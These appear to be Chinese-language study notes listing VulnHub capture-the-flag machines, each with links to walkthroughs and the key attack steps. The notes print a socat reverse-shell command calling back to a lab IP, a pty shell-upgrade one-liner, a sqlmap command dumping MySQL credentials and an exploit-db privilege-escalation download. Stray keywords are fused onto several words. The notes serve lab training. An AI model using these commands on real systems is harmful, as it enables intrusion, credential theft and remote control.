靶場測試系列(已辦清單)

在線靶場

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps

總清單

http://www.hackingarticles.in/capture-flag-challenges/

Hackademic: RTB1

地址

https://www.vulnhub.com/entry/hackademic-rtb1,17/

wp

http://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/

重點

sql 注入獲取 wordpress 管理員密碼,而後後臺上傳拿 shell.php

使用python

python -c 'import pty; pty.spawn("/bin/bash")'

shell 轉成 tty shell 用於提權mysql

而後用linux

https://www.exploit-db.com/download/40839

提權git

轉 交互式 shell 的另外一種方式github

攻擊者的機器,監聽sql

socat file:`tty`,raw,echo=0 tcp-listen:4444

被攻擊的機器端執行,反彈 shellshell

./socat_i386_static exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.128:4444

參考

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/static-linux/static-binaries-i386/blob/master/socat-2.0.0-b8.tar.gz
https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

De-ICE

地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

wp

http://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/

重點

sql 注入獲取 數據庫用戶名和密碼數據庫

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

用獲取到的用戶名和密碼嘗試登錄 sshbash

而後用 linux-exploit-suggesterexp ,最後用

https://www.exploit-db.com/download/40839

拿到 root

必定按流程走,先蒐集漏洞信息,後面綜合考慮利用。

pWnOS-2.0

地址

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

wp

http://www.hackingarticles.in/hack-the-pwnos-2-0-boot-2-root-challenge/

重點

  • 利用 開源系統的漏洞,生成用戶名
  • 登錄後文件上傳漏洞 getshell
  • exp 提權

PwnLab: init

地址

https://www.vulnhub.com/entry/pwnlab-init,158/

wp

http://www.hackingarticles.in/penetration-testing-pwnlab-ctf-challenge/

重點

  • 文件包含( 限制了文件結尾 ) + php 流 獲取 php 文件內容
  • 登錄後上傳圖片,而後利用包含獲取 shell
  • 使用 exp 提權
相關文章
相關標籤/搜索